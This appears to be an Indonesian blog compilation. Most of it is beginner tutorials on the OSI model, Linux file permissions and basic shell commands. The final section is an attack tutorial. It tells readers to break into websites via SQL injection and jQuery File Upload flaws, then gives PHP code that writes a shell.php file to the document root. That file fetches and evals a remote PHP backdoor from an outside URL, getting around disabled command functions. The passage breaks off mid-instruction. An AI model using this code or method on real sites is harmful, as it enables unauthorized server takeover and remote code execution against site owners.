Dragon Xploiter

Assalamualaiku Wr.Wb

Kembali lagi dengan saya AdelwinNL, Kali ini saya akan menjelaskan pemahaman saya mengenai osi layer.

A. Pengertian

osi layer merupakan model yang dibuat oleh iso alias organisasi yang membuat standarisasi bertingkat internasional di eropa yang menerangkan mengenai bagaimana bagaimana internet bekerja.

jadi model ini digunakan dalam konstruksi jaringan internet dan juga memahami bagaimana sebuah internet bekerja. osi ini bertingkat internasional alias satu dunia , karena dibuat oleh organisasi yang bertingkat internasional . osi ini juga digunakan dalam konstruksi jaringan iternet satu dunia

B. Fungsi

osi layer digunakan untuk membangun sebuah jaringan , mengenai apa saja yang harus dilakukan dan direncanakan. model ini juga berfungsi untuk memahami jaringan internet yang ada di dunia. karena itulah memahami osi layer sangat penting untuk memahami cara kerja internet di dunia

C. Cara Kerja

osi layer memiliki 7 lapis layer yang setiap lapisnya sangat penting untuk membuat jaringan internet yang didunia bekerja . berikut merupakan 7 lapisnya :

1. pyshical layer

yaitu layer yang layer yang berhubunga dengan fisik. seperti topologi jaringan , kabel atau nirkabel, ethernet atau wireless, dan pengkabelan.

2. Data-link layer

layer ini berfungsi untuk menentukan bagaimana bit-bit data dikelompokan menjadi kelompok yang bernama "frame". kemudian dikirim melalui hub,switch,router melalui fram-frame tadi menuju MAC address tertentu

3.network layer

yaitu layer yang berfungsi untuk peng-alamatan ip address dan juga membuat header untuk paket-paket yang ada dan melakukan routing melalui router.

4.transport layer

berfungsi untuk mengirimkan paket-paket dan memberi nomor urut untuk merka dan menyusunnya kembali ketika sudah sampai ke tempat tujuan.

layer ini juga berfungsi untuk mentransfer ulang paket-paket yang hilang di perjalanan.

5. Session layer

berfungsi untuk mendefinisikan bagaimana koneksi dibuat, dipelihara, atau dihancurkan. Selain itu, di tingkat ini juga dilakukan resolusi nama

6. Presentation Layer

berfungsi untuk menerjemahkan data yang akan dikirimkan menjadi format yang dapat dikirimkan melalui jenis jaringan.

7. Application Layer

berfungsi sebagai antarmuka antara aplikasi penampil data dengan funsionalitas jaringan. dan juga mengatur bagaimana aplkasi tersebut dapat berinteraksi dengan jaringan dan membuat pesanpesan kesalahan.

E. Penutup

Demikian yang dapat saya sampaikan mengenai pemahaman saya tentang OSI LAYER jika ada kesalahan saya mohon maaf, sekian dari saya, terimakasih....

Wassalamualaiku Wr.Wb

Assalamualaikum wr wb.

Kembali lagi dengan saya Adelwin, kali ini saya akan menjelaskan tentang File permission di linux. saat kita membuat file di linux file tersebut memiliki beberapa hak akses seperti read , write dan execute.

kita juga dapat mengatur hak akses file tersebut bila diakses oleh user lain. dan kita juga dapat memberikan hak akses file tersebut hanya untuk user tertentu.

hak akses ini sangat penting supaya user lain tidak dapat melihat atau merubah file yang kita buat , kita juga dapat mengatur supaya file tersebut hanya bisa dirubah dan dibaca oleh user tertentu.

Mengubah Hak Akses Dengan Command chmod

untuk mengubah hak akses suatu file di linux. kita dapat merubahnya melalui terminal. caranya adalah menggunakan command "chmod".

sebelum merubah suatu hak akses , ketahui dulu tentang beberapa hak akses yang dimiliki suatu file.

suatu file dapat memiliki beberapa hak akses dibawah :

Read : membaca isi file tersebut. (4)
Write : memodifikasi isi file. (2)
Execute : hak akses untuk mengeksekusi file tersebut.(1)

jadi, sebuah file yang memiliki hak akses read. file tersebut dapat dibaca oleh orang dan dia juga dapat menghapusnya.

namun jika file tadi tidak memiliki akses write untuk orang tadi . file tersebut tidak akan dapat dimodifikasi alias dirubah.

sedangkan execute adalah hak akses untuk meng-execute alias menjalankan file tadi. akses ini biasanya terdapat pada file aplikasi.

file tadi juga dapat memiliki beberapa hak akses tersebut, seperti read-write, read-execute, atau read-write-execute.

untuk mengatur hak akses tersebut kita dapat mengubahnya dengan command "chmod" slias change mode. caranya:

untuk mengganti hak akses suatu file supaya hanya bisa dimodifikasi oleh kita dan orang lain hanya dapat membaca dan mengexecute-nya . caranya:

ketik : chmod 755 nama_file.

kode 755 diatas memiliki arti :

7 (4 +2 + 1 )= 4 mewakili read dan 2 mewakili write .dan 1 untuk execute untuk memberi hak akses secara sekaligus kita dapat menambah kan antara 4 ,2 dan 1.
5 (4 + 1) = 4 mewakili hak akses read dan 1 mewakili execute.

digit pertama mewakili hak akses untuk owner, digit kedua untuk hak akses bagi group, dan digit ketiga untuk hak akses other.

jadi :

read diwakili angka 4.
write diwakili angka 2.
execute diwakili angka 1.
dan untuk memberi beberapa hak akses sekaligus , tambahkan angka-angka tadi. contoh : hak akse untuk : read & execute => 4 + 1 = (5).

dalam mengubah suatu hak akses file kita juga dapat mengatur hak aksesnya bagi orang lain seperti owner/pemilik file, group dan other.

owner adalah user yang membuat file tadi.
group adalah user yang satu grup dengan owner.
other adalah user selain owner dan user yang satu grup dengan owner.

kita juga bisa membuat grup dan dapat memasukan user lain kedalamnya. untuk melihat kita berada di grup apa lihat di -> user & group.

Kepemilikan Suatu File Di Linux

selain hak akses , suatu file di linux juga memiliki atribut kepemilikan . suatu file bisa kita ubah kepemilikannya dengan command chown alias change owner.

caranya : masuk ke root , lalu ketik -> chown user_pemilik nama_file.

pemilik yang dimaksud adalah user lain alias user lain yang berada dalam satu laptop atau pc.

intinya sebuah file bisa memiliki hak akses. sehingga kita bisa mengatur agar user lain tidak bisa memodifikasinya atau bahkan tidak bisa membacanya.

untuk mengatur hak akses tersebut. kita menggunakan command "chmod".

sebuah file juga memiliki attribut kepemilikan , dan kita juga dapat mengubah kepemilikan tersebut melalui root.

untuk user yang tidak memiliki kepemilikan dari sebuah file. user tersebut tidak dapat merubah hak akses untuk membaca dan mengedit file tersebut.

mungkin demikian yang dapat saya sampaikan. Sekian dari saya terimakasih.

Wassalamualaikum Wr.Wb.

Assalamualaiku Wr. Wb

Halo saya Adelwin, kali ini saya akan mengenalkan kepada kalian beberapa Command/perintah pada linux. Bagi yang pemula di linux, sangat penting untuk mengetahui bahwa linux bisa di keluarkan potensinya secara 100% melalui terminal. dan bukan melalui GUI (Graphical User Interface).

1. "pwd"

pwd kependekan dari Print Working Directory. Fungsi dari command ini adalah untuk mengetahui di directory manakah anda berada.

contoh : ketika membuka terminal kita akan di sebuah directory file. biasanya berada di " /home/nama_user ". untuk mengetahui dimana kita berada, ketikan " pwd " di terminal, kemudian terminal akan memberitahu dimana anda berada.

2. " cd "

command berikutnya adalah " cd " kependekan dari Change Directory. command ini berguna untuk mengganti directori dimana kamu berada.

contoh : Saat kalian membuka terminal kalian biasanya akan berada di /home/nama_user untuk turun satu directory coba ketikan " cd .. " maka directory-mu akan berada di /home . dan misalkan kamu ingin pergi ke suatu directory , cukup ketikan " cd nama_directory ".

3. " ls "

yang berikutnya adalah " ls " atau List.command ini berfungsi menampilkan isi file/folder dari sebuah directory .

misalkan : jika ingin mengetahui daftar list dari sebuah directory/folder . cukup pergi ke directory tersebut kemudian ketikan " ls ". secara otomatis terminal akan menampilkan isi directory tersebut .

4. " sudo "

sudo alias SuperUser DO adalh command untuk mengakses command yang hanya bisa dijalankan oleh user root.

user root adalah user yang meimiliki hak akses tertinggi dalam sistem operasi tersebut. sehingga dapat mengakses konfigurasi atau kustomisasi apapun dalam sistem tersebut.

contoh : dalam sebuah komputer bisa saja terdapat lebih dari satu user. namun hanya salah satu dari user tersebut yang dapat mengakses segala hal yang ada didalam sistem , yaitu user root.

seperti saat ingin menginstal aplikasi . untuk menginstal aplikasi melalui terminal. command-nya adalah " apt-get install nama_aplikasi ". namun jika kita hanya mengetikan command tersebut sistem akan menolak akses kita . untuk mengaksesnya ketikan " sudo " diawal command tadi.

seperti ini : " sudo apt-get install nama_aplikasi ". maka terminal akan meminta password user root dan ketika password sudah dimasukan barulah proses instalasi dimulai.

5. touch

touch adalah command yang digunakan untuk membuat file kosong baru melalui terminal. command ini mungkin kurang berguna jika linux kamu sudah mempunyai GUI, namun akan sangat berguna jika kita ingin membuat file dikomputer server yang mungkin belum memiliki GUI.

cara pakai : ketik " touch " kemudian nama_file seperti ini [ touch file_baru ]. secara otomatis linux akan membuat file baru yang masih kosong.

kamu juga bisa membuat file kosang yang banyak secara sekaligus seperti [ touch file_1 file_2 file_3].

6. " mkdir "

command berikunya adalah mkdir alias MaKe DIRectory. sesuai namanya command ini berfungsi untuk membuat directory baru.

cara pakainya , cukup ketikan " mkdir " di terminal . maka secara otomatis linux akan membuat directory atau folder baru.

7. " rm "

" rm "alias remove. adalah command yang berfungsi untuk menghapus sebuah file.

contoh : untuk menghapus sebuah file yang bernama "gambar" cukup pergi ke directory file tersebut lalu ketikan " rm gambar ".

namun jika kamu ingin menghapus sebuah folder alias directory tambahkan " -rf " setelah rm .

contoh : " rm -rf nama_directory " . command tersebut akan menghapus folder atau directory bernama "nama_directory" beserta isi didalamnya.

8. " cp "

merupakan kependekan dari CoPy . sesuai namanya command ini berfungsi untuk meng-copy fiile menuju directory yang lain.

contohnya : ada sebuah file bernama gambar.jpg dan ingin memindahkannya dari Downloads ke Pictures.

cara nya pergi ke directory file yang akan di-copy , lalu ketik " cp " nama_file directory_yang_di_tuju lalu ingiin dinamai apa file tersebut di direcory ini.nama file yang dicopy bileh sama boleh berbeda. sesuai kebutuhan.

/home/user_name/Downloads ~ [ cp gambar.jpg ../Pictures/gambar.jpg ] .

9. " mv "

" mv " alias move. adalah command yang berfungsi untuk memindahkan atau meng-cut sebuah file ke directory lain.

cara penggunaanya sama dengan cp. yaitu pergi ke directory file yang ingin di cut. ketik mv nam_file directory_yang_di_tuju/nama_file_di_directory_trsbt. maka secara otomatis linux akan meng-cut file terseut dan memindahkannya ke directory trsbt dan mengganti nama file tadi dengan nama tersebut.

10. " rmdir "

adalah kependekan dari ReMove DIRectory. berfungsi untuk menghapus directory yang tidakada isinya di dalam directory tersebut. jika ingin menghapus directory beserta isinya , pakai command yang tadi rm -rf nama_directory.

demikian adalah beberapa command linux yang perlu diketahui pemula. demikian pula dari saya.

wassalamualaikum wr wb.

Hai Sobat.

Saya ikal,

Disini saya akan share sesuatu nih.

Pernah gak sih kalian capek capek ngelakuin injeksi sql dan berhasil tembus ke dashboard admin, eh pas udah upload shell, shellnya terdownload. Atau udah capek capek ngedork sana sini pakai google,bing,atau mungkin kalian sampai ngedork di duckduckgo pas nemu site vuln eh shell yang sudah terupload malah terdownload.

Nah mimin punya trik untuk membypassnya, Tapi pertama tama hal yang harus diperhatikan untuk melakukan trik ini ialah saat shell terdownload, code dari shell kita tereksekusi oleh server. Contohnya disini mimin punya site yang vuln terhadap JFU (Jquery File Upload), Dan saat selesai mimin upload webshell ketarget, mimin akses webshellnya yang terjadi adalah file webshell tadi terdownload. Tapi, saat mimin buka, code dari file tersebut telah tereksekusi.

Jika tereksekusi seperti diatas, berarti kita hanya tinggal melakukan RCE kesitarget saja, Disini mimin punya kebiasaan kalo mau melakukan RCE mimin bakal cek phpinfo nya dulu untuk mengetahui disable_function apa saja yang ada. Mimin upload code seperti ini.

<?php phpinfo(); ?>

Upload lalu akses filenya dan buka dicode editor apa saja. Dan saat mimin cek ternyata function system,passthru,exec,shell_exec didisable oleh server. yaudah lakuin ini aja biar garibet ribet.

Simpan code dibawah lalu upload file berisi code dibawah ke target kalian.

<?php

$dir = $_SERVER['DOCUMENT_ROOT'] . '/';
$file_to_write = 'shell.php';
$content_to_write = "<?php eval('?>'.file_get_contents('https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php'));?>";
if( is_dir($dir) === false )
{
    mkdir($dir);
}
$file = fopen($dir . '/' . $file_to_write,"w");
fwrite($file, $content_to_write);
fclose($file);
include $dir . '/' . $file_to_write;

?>

Lalu upload kewebsite target kalian. Jika sudah berhasil terupload, akses file tadi maka kalian akan mendownload filenya. Jika sudah terdownload, lanjut kalian akses seperti ini.